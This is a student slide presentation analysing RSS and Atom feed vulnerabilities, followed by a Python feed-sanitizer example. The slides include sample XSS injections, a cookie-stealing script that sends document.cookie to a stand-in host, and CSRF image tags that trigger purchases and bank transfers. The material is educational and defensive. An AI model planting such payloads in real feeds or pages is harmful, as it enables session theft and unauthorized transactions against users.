An analysis of RSS security
Research Topic, Network Security, CmpE 209
Dr. Richard Sinn
Sarbjeet Singh (005886296)
Uma Nandanam (006259825)
Introduction
• RSS (Really Simple Syndication or Rich Site Summary) is a new and efficient content distribution feature that uses the XML format.
• RSS is used to distribute information (stories/news/articles, blog posts, video clips, audio clips, etc.) on a topic you choose from your favorite website. You need to subscribe to receive this information (called RSS feeds).
• These RSS feeds come to you, and a reader on your computer reads this information. The reader can be stand-alone software or web based.
• Using RSS, we don't waste time looking for the information we need on the websites or waiting for the pages to load.
• To subscribe to a feed, look for the RSS button on your favorite website.
• To subscribe to SJSU RSS feeds: www.sjsu.edu/rss
RSS Security Vulnerabilities
• The major RSS security vulnerabilities involve the elements of the feeds.
• RSS: feed title, item description, item title and item link XML elements.
• Atom: author name, entry update element, feed title, feed sub-title, feed update.
• Attackers can inject scripts into these elements.
• A few threats:
• Phishing (redirecting a user to a malicious website)
• Stealing cookies
• Deploying malware
• Browser activity monitoring
RSS Security Vulnerabilities (Contd.)
HTML literal injections
• The RSS specification allows HTML entities in the <description> element so that content can carry HTML formatting. However, the specification does not say how literal HTML tag inclusions should be handled.
• Some readers treat "<" and ">" as literals: when a feed contains HTML tags, in certain cases the content is displayed literally.
• When RSS readers or aggregators render these tags instead of treating them as literals, they execute the scripts (engineered by the attacker) in the feed:
  <?xml version="1.0" encoding="ISO-8859-1"?>
  <rss version="2.0">
    <channel>
      <title>The title of my RSS 2.0 Feed</title>
      <link>http://www.vaishnavinandanam.com/</link>
      <description><script>alert('Description of feed')</script></description>
      <lastBuildDate>Tue, 21 Apr 2009 18:30:00 GMT</lastBuildDate>
      <language>en-us</language>
      <item>
        <title><script>alert('Title of an item')</script></title>
        <link>http://vaishnavinandanam.com/item/RSS</link>
        <guid>http://vaishnavinandanam.com/item/RSS</guid>
        <pubDate>Tue, 21 Apr 2009 18:30:00 GMT</pubDate>
        <description><![CDATA[ This is the description about RSS security examples ]]></description>
      </item>
    </channel>
  </rss>
RSS Security Vulnerabilities (Contd.)
HTML entity injections
• Some readers convert the HTML entities in the feed to their true values, so potential script injections are inserted into the feeds in entity-encoded form. The RSS readers convert &lt; to '<' and &gt; to '>', and the content is added and viewed by the browser component. Most of the readers store this content to a file in the local directories.
  <title>&lt;script&gt;alert('Item Title')&lt;/script&gt;</title>
  <link>http://host/?&lt;script&gt;alert('Item Link')&lt;/script&gt;</link>
  <description>&lt;script&gt;alert('Item Description')&lt;/script&gt;</description>
Cross site scripting:
• Today most of the Web 2.0 sites deliver dynamic content; using web-based readers can lead to cross-site scripting (also called CSS or XSS).
• Examples: hijacking of accounts, changing the user settings, stealing cookies, theft and false advertising.
• Stealing cookies from the online web reader:
  <description>
    <script>document.location='http://abc/cgi-bin/cookie.cgi?'+document.cookie</script>
  </description>
RSS Security Vulnerabilities (Contd.)
Cross site request forgery (CSRF)
• Unauthorized commands are transmitted from a user that the website trusts.
• Example 1: An attacker can make your computer send requests to a web site using CSRF attacks. The attacker can inject an '<img src>' tag into the feed and make your computer connect to a website and perform web actions:
  <description>
    <img src="https://store.vaishnavi.com/buy?item=stamps&amp;quantity=989">
  </description>
• Example 2: You are accessing a blog site and accessing a malicious feed. This feed has malicious JavaScript that can capture the keystrokes from your computer and relay them to the attacker's host.
• Example 3: You log in to bank.com and authenticate. At the same time you also download a malicious feed:
  <img src="http://bank.com/transfer?to_account=my_account_number&amount=all_of_your_money">
  A request is issued from your browser (you became the victim) to the bank's website for a transfer of money.
RSS Security Vulnerabilities (Contd.)
Re-syndication vulnerability
• Server-1 stores a malicious feed; this feed is downloaded by the subscribers, including other servers (Server-2 and Server-3).
• Server-2 and Server-3 create a web feed that includes Server-1's feed content without sanitizing it.
• This content on Server-2 and Server-3 is downloaded by the respective subscribers of Server-2 and Server-3.
• In this process of re-syndicating, many clients get affected.
[Diagram: Server-1 stores the malicious feed; over the Internet, the Server-2 feed and the Server-3 feed also include the Server-1 feed]
RSS Security Vulnerabilities (Contd.)
Local zone risks
• Affects the subscriber's system. Readers typically convert the feed into an HTML file and store it in a local directory.
• This file is loaded into a browser instance. This file can have ActiveX objects with permissions to read/write files on the disk.
• The feed can be engineered to read a local file and send a copy to the attacker's intended host on the Internet.
RSS Spam
• Keyword surfing
• Link farms
• Fake RSS feeds
• How to protect: a user can unsubscribe from the feed.
Conclusions
Vulnerabilities are because of:
• The feed is malicious.
• The site that provides the feed is hacked.
• The web-based feed is created from mailing lists, bulletin board messages, or P2P.
• The feed is modified during transport.
• It is extremely difficult to safely consume an RSS feed.
• The feed elements such as the <description> element allow arbitrary encoded HTML.
• Arbitrary code can carry vulnerable payloads.
• RSS readers should remove HTML entities and meta characters before displaying the feed to the user. Sanitize the feed by looking for and stripping off vulnerable tags.
• Knowing the security implications regarding feeds and readers will help you avoid some things such as CSS.
• Before displaying the feed, a safe RSS reader can strip tags such as script, embed, object, frameset, meta, link, style, etc.
• Attackers don't just explore weaknesses on the server but also on the client. Client-side vulnerabilities: engineering scripts in the feed and extracting information.
• In the case of feed readers, ensure that scripts, applets, and plug-ins are disabled.
• Regular expressions can be used to filter script tags from user-supplied inputs.
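As an added example (not part of the slides), the following Python reader-side sanitizer applies the conclusions above to both injection styles described earlier: literal <script> tags in a CDATA description and entity-encoded tags that the XML parser decodes. It goes beyond the regex-filter suggestion by rebuilding the HTML from an allowlist with a real parser; the tag and attribute lists, the sample feed and its host names are assumptions.

```python
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br", "ul", "ol", "li"}  # all else dropped
ALLOWED_ATTRS = {"a": {"href"}}  # so on* handlers, src, style, etc. never survive
SAFE_SCHEMES = ("http://", "https://")  # rejects javascript:, data:, vbscript: links

class FeedSanitizer(HTMLParser):
    """Rebuilds feed HTML from an allowlist instead of regex-stripping <script> tags."""
    def __init__(self):
        super().__init__(convert_charrefs=True)  # &lt;script&gt; arrives as text, not as a tag
        self.out, self.skip = [], 0  # skip > 0 while inside a <script>/<style> body
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            if tag in ("script", "style"):
                self.skip += 1  # drop the element body, not just the tags
            return
        kept = [f' {n}="{html.escape(v)}"' for n, v in attrs
                if n in ALLOWED_ATTRS.get(tag, set()) and v
                and v.strip().lower().startswith(SAFE_SCHEMES)]
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))  # decoded entities are re-escaped, so they stay literal

def sanitize_html(fragment):
    p = FeedSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)

def sanitize_feed(xml_text):
    """Return [(title, description)] per <item>: title is plain text, description is HTML."""
    root = ET.fromstring(xml_text)
    return [(html.escape(item.findtext("title", default="")),
             sanitize_html(item.findtext("description", default="")))
            for item in root.iter("item")]

# Constructed sample feed (not from the slides): entity-encoded script in <title>, then a literal
# <script>, a CSRF-style <img> and a javascript: link inside a CDATA <description>.
SAMPLE = """<?xml version="1.0"?><rss version="2.0"><channel><title>demo</title>
<item><title>&lt;script&gt;alert('Item Title')&lt;/script&gt;</title>
<description><![CDATA[Buy <b>stamps</b> <img src="https://store.example/buy?item=stamps"><script>alert(1)</script> <a href="javascript:alert(2)">x</a> <a href="https://example.org/">ok</a>]]></description></item>
</channel></rss>"""
```

Running sanitize_feed(SAMPLE) keeps the bold text and the https link, drops the image and the script body, strips the javascript: href, and leaves the entity-encoded title displayed literally.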
“Things that think…don’t make sense unless they link.” - Nicholas Negroponte, MIT Media Laboratory